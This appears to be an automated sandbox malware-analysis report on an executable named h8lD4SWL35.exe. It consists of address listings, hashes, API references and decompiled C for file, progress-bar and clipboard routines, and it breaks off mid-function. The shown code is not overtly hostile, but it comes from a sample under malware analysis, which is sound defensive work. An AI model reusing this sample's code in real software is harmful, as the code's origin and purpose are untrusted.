                                                                                0x0040651e
                                                                                0x0040651e
                                                                                0x00406526
                                                                                0x0040652b
                                                                                0x0040652d
                                                                                0x00406530
                                                                                0x00406530
                                                                                0x0040655f
                                                                                0x00406566
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00406566
                                                                                0x00406479
                                                                                0x0040647c
                                                                                0x0040647e
                                                                                0x00406481
                                                                                0x00406484
                                                                                0x00406487
                                                                                0x00406489
                                                                                0x0040648c
                                                                                0x0040648f
                                                                                0x0040648f
                                                                                0x00406492
                                                                                0x00406492
                                                                                0x00406495
                                                                                0x0040649c
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x0040649c
                                                                                0x00406422
                                                                                0x00406425
                                                                                0x00406427
                                                                                0x0040642a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406189
                                                                                0x00406189
                                                                                0x0040618d
                                                                                0x004067d2
                                                                                0x00000000
                                                                                0x004067d2
                                                                                0x00406193
                                                                                0x00406196
                                                                                0x00406199
                                                                                0x0040619c
                                                                                0x0040619f
                                                                                0x004061a2
                                                                                0x004061a5
                                                                                0x004061a7
                                                                                0x004061aa
                                                                                0x004061ad
                                                                                0x004061b0
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406314
                                                                                0x00406314
                                                                                0x00406318
                                                                                0x004067de
                                                                                0x00000000
                                                                                0x004067de
                                                                                0x0040631e
                                                                                0x00406321
                                                                                0x00406324
                                                                                0x00406327
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x0040632c
                                                                                0x0040632f
                                                                                0x00406332
                                                                                0x00406335
                                                                                0x00406338
                                                                                0x0040633b
                                                                                0x0040633c
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x00406341
                                                                                0x00406344
                                                                                0x00406347
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634d
                                                                                0x0040634f
                                                                                0x0040634f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406595
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040659b
                                                                                0x0040659e
                                                                                0x004065a1
                                                                                0x004065a4
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a9
                                                                                0x004065ac
                                                                                0x004065af
                                                                                0x004065b2
                                                                                0x004065b5
                                                                                0x004065b8
                                                                                0x004065b9
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065be
                                                                                0x004065c1
                                                                                0x004065c4
                                                                                0x004065c7
                                                                                0x004065ca
                                                                                0x004065ce
                                                                                0x004065d0
                                                                                0x004065d3
                                                                                0x00000000
                                                                                0x004065d5
                                                                                0x00406352
                                                                                0x00406352
                                                                                0x00000000
                                                                                0x00406352
                                                                                0x004065d3
                                                                                0x00406808
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e37
                                                                                0x0040683f
                                                                                0x0040683f
                                                                                0x00000000
                                                                                0x0040683f
                                                                                0x0040668c
                                                                                0x00406613
                                                                                0x00406610

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ba1ec98e443bf64d4e9d141d7fb0b9725a9427972a01449508741c3e626c9178
                                                                                • Instruction ID: bd0f7a03b050ac2f67cb53c5203c96ff2ccc7a0484a423c5cbe4bc6567bf8ab8
                                                                                • Opcode Fuzzy Hash: ba1ec98e443bf64d4e9d141d7fb0b9725a9427972a01449508741c3e626c9178
                                                                                • Instruction Fuzzy Hash: CD714471D00229CBEF28CF98C8547AEBBB1FB44305F15816AD956BB281C7789A86DF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 69%
                                                                                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423eb0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42366c =  *0x42366c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42366c, 0x7530,  *0x423654), 0);
					}
				}
				return 0;
			}











                                                                                0x0040138a
                                                                                0x004013fa
                                                                                0x0040139b
                                                                                0x004013a0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004013a2
                                                                                0x004013a3
                                                                                0x004013ad
                                                                                0x00000000
                                                                                0x00401404
                                                                                0x004013b0
                                                                                0x004013b7
                                                                                0x004013bd
                                                                                0x004013be
                                                                                0x004013c0
                                                                                0x004013c2
                                                                                0x004013b9
                                                                                0x004013b9
                                                                                0x004013ba
                                                                                0x004013ba
                                                                                0x004013c9
                                                                                0x004013cb
                                                                                0x004013f4
                                                                                0x004013f4
                                                                                0x004013c9
                                                                                0x00000000

                                                                                APIs
                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                • SendMessageA.USER32 ref: 004013F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                • Instruction ID: 9357c62ddf9e7b3c824d0b87f8e4bad160879ee2cb8093492041203a2cf1b2c1
                                                                                • Opcode Fuzzy Hash: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                • Instruction Fuzzy Hash: A301F431724210ABE7295B389D04B2A36ADF710355F10427BF855F66F1D67CDC028B4D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004056B4, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E004056B4(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                0x004056b8
                                                                                0x004056c5
                                                                                0x004056da
                                                                                0x004056e0

                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\h8lD4SWL35.exe,80000000,00000003), ref: 004056B8
                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate
                                                                                • String ID:
                                                                                • API String ID: 415043291-0
                                                                                • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                                                • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040304E, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040304E(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                0x00403052
                                                                                0x00403065
                                                                                0x0040306d
                                                                                0x00000000
                                                                                0x00403074
                                                                                0x00000000
                                                                                0x00403076

                                                                                APIs
                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EA7,000000FF,00000004,00000000,00000000,00000000), ref: 00403065
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                • Instruction ID: cf04fcf122da41e7499d2f74f705547a68887b1f6d4f421339b8fb166199a16f
                                                                                • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                • Instruction Fuzzy Hash: 2AE08C32901118BBCF205E619C00EAB3B5CEB053A2F00C032FA14E52A0D630EA11DBAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403080, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00403080(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                0x0040308e
                                                                                0x00403094

                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,?), ref: 0040308E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004054FB, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004054FB(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                0x004054fb
                                                                                0x0040550e
                                                                                0x0040550e
                                                                                0x00405512
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405505
                                                                                0x00405508
                                                                                0x00000000
                                                                                0x00405508
                                                                                0x00000000
                                                                                0x00405505
                                                                                0x00405514

                                                                                APIs
                                                                                • CharNextA.USER32(?,00403176,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000020), ref: 00405508
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CharNext
                                                                                • String ID:
                                                                                • API String ID: 3213498283-0
                                                                                • Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                • Instruction ID: 4d956687522218a8d382f60df26940a2f5368e95d4cbeb2580b699aececf1af3
                                                                                • Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                • Instruction Fuzzy Hash: 9BC0806440C54077C5105B204C344677FE5AA91745F249897F4C163155C134A840CB3B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00404EB9, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E00404EB9(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423664;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E4D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E004059FF(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420478;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42364c == _t149) {
							ShowWindow( *0x423e88, 8);
							if( *0x423f0c == _t149) {
								E00404D7B( *((intOrPtr*)( *0x41fc48 + 0x34)), _t149);
							}
							E00403D68(1);
							goto L25;
						}
						 *0x41f840 = 2;
						E00403D68(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403DF6(_a8, _a12, _a16);
						}
						ShowWindow( *0x423650, _t149);
						ShowWindow(_t154, 8);
						E00403DC4(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423e90;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423650 = GetDlgItem(_a4, 0x403);
				 *0x423648 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423664 = _t127;
				_v8 = _t127;
				E00403DC4( *0x423650);
				 *0x423654 = E0040461D(4);
				 *0x42366c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403D8F(_a4);
				if(( *0x423e98 & 0x00000003) != 0) {
					ShowWindow( *0x423650, _t149);
					if(( *0x423e98 & 0x00000002) != 0) {
						 *0x423650 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403DC4( *0x423648);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423e98 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                                                                0x00404ec2
                                                                                0x00404ec8
                                                                                0x00404ed1
                                                                                0x00404ed4
                                                                                0x0040506c
                                                                                0x00405090
                                                                                0x00405090
                                                                                0x004050a3
                                                                                0x004050c1
                                                                                0x004050c8
                                                                                0x0040511f
                                                                                0x00405123
                                                                                0x00000000
                                                                                0x0040512a
                                                                                0x00405132
                                                                                0x0040513a
                                                                                0x0040513d
                                                                                0x00405236
                                                                                0x00000000
                                                                                0x00405236
                                                                                0x0040514c
                                                                                0x00405158
                                                                                0x0040515e
                                                                                0x00405164
                                                                                0x00405179
                                                                                0x0040517f
                                                                                0x00405166
                                                                                0x0040516b
                                                                                0x00405171
                                                                                0x00405174
                                                                                0x00405174
                                                                                0x0040518f
                                                                                0x00405197
                                                                                0x0040519a
                                                                                0x004051a3
                                                                                0x004051a6
                                                                                0x004051ad
                                                                                0x004051b4
                                                                                0x004051bc
                                                                                0x004051bc
                                                                                0x004051d3
                                                                                0x004051d3
                                                                                0x004051da
                                                                                0x004051e0
                                                                                0x004051e9
                                                                                0x004051f0
                                                                                0x004051f9
                                                                                0x004051fb
                                                                                0x004051fe
                                                                                0x0040520d
                                                                                0x0040520f
                                                                                0x00405215
                                                                                0x00405216
                                                                                0x00405217
                                                                                0x0040521f
                                                                                0x0040522a
                                                                                0x00405230
                                                                                0x00405230
                                                                                0x00000000
                                                                                0x0040519a
                                                                                0x00405123
                                                                                0x004050d0
                                                                                0x00405100
                                                                                0x00405108
                                                                                0x00405113
                                                                                0x00405113
                                                                                0x0040511a
                                                                                0x00000000
                                                                                0x0040511a
                                                                                0x004050d4
                                                                                0x004050de
                                                                                0x00000000
                                                                                0x004050a5
                                                                                0x004050ab
                                                                                0x004050e3
                                                                                0x00000000
                                                                                0x004050ec
                                                                                0x004050b4
                                                                                0x004050b9
                                                                                0x004050bc
                                                                                0x00000000
                                                                                0x004050bc
                                                                                0x004050a3
                                                                                0x00404eda
                                                                                0x00404ede
                                                                                0x00404ee7
                                                                                0x00404eee
                                                                                0x00404ef1
                                                                                0x00404ef4
                                                                                0x00404ef7
                                                                                0x00404ef8
                                                                                0x00404ef9
                                                                                0x00404f12
                                                                                0x00404f15
                                                                                0x00404f1f
                                                                                0x00404f2e
                                                                                0x00404f36
                                                                                0x00404f3e
                                                                                0x00404f43
                                                                                0x00404f46
                                                                                0x00404f52
                                                                                0x00404f5b
                                                                                0x00404f64
                                                                                0x00404f87
                                                                                0x00404f8d
                                                                                0x00404f9e
                                                                                0x00404fa3
                                                                                0x00404fb1
                                                                                0x00404fbf
                                                                                0x00404fbf
                                                                                0x00404fc4
                                                                                0x00404fd2
                                                                                0x00404fd2
                                                                                0x00404fd7
                                                                                0x00404fda
                                                                                0x00404fdf
                                                                                0x00404feb
                                                                                0x00404ff4
                                                                                0x00405001
                                                                                0x00405010
                                                                                0x00405003
                                                                                0x00405008
                                                                                0x00405008
                                                                                0x0040501c
                                                                                0x0040501c
                                                                                0x00405030
                                                                                0x00405039
                                                                                0x00405042
                                                                                0x00405052
                                                                                0x0040505e
                                                                                0x0040505e
                                                                                0x00000000

                                                                                APIs
                                                                                • GetDlgItem.USER32 ref: 00404F18
                                                                                • GetDlgItem.USER32 ref: 00404F27
                                                                                • GetClientRect.USER32 ref: 00404F64
                                                                                • GetSystemMetrics.USER32 ref: 00404F6C
                                                                                • SendMessageA.USER32 ref: 00404F8D
                                                                                • SendMessageA.USER32 ref: 00404F9E
                                                                                • SendMessageA.USER32 ref: 00404FB1
                                                                                • SendMessageA.USER32 ref: 00404FBF
                                                                                • SendMessageA.USER32 ref: 00404FD2
                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404FF4
                                                                                • ShowWindow.USER32(?,00000008), ref: 00405008
                                                                                • GetDlgItem.USER32 ref: 00405029
                                                                                • SendMessageA.USER32 ref: 00405039
                                                                                • SendMessageA.USER32 ref: 00405052
                                                                                • SendMessageA.USER32 ref: 0040505E
                                                                                • GetDlgItem.USER32 ref: 00404F36
                                                                                  • Part of subcall function 00403DC4: SendMessageA.USER32 ref: 00403DD2
                                                                                • GetDlgItem.USER32 ref: 0040507B
                                                                                • CreateThread.KERNEL32 ref: 00405089
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405090
                                                                                • ShowWindow.USER32(00000000), ref: 004050B4
                                                                                • ShowWindow.USER32(?,00000008), ref: 004050B9
                                                                                • ShowWindow.USER32(00000008), ref: 00405100
                                                                                • SendMessageA.USER32 ref: 00405132
                                                                                • CreatePopupMenu.USER32 ref: 00405143
                                                                                • AppendMenuA.USER32 ref: 00405158
                                                                                • GetWindowRect.USER32 ref: 0040516B
                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040518F
                                                                                • SendMessageA.USER32 ref: 004051CA
                                                                                • OpenClipboard.USER32(00000000), ref: 004051DA
                                                                                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051E0
                                                                                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051E9
                                                                                • GlobalLock.KERNEL32 ref: 004051F3
                                                                                • SendMessageA.USER32 ref: 00405207
                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040521F
                                                                                • SetClipboardData.USER32 ref: 0040522A
                                                                                • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405230
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                • String ID: {
                                                                                • API String ID: 590372296-366298937
                                                                                • Opcode ID: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                                                                • Instruction ID: d8c2bf4a41f8d47596d7e212a196e63f96e24a60825c263716f9721a4c55cacb
                                                                                • Opcode Fuzzy Hash: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                                                                • Instruction Fuzzy Hash: 99A13A71900208BFDB219F60DD89EAE7F79FB04355F00817AFA04BA2A0C7799A51DF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004046CA, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 97%
                                                                                			E004046CA(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
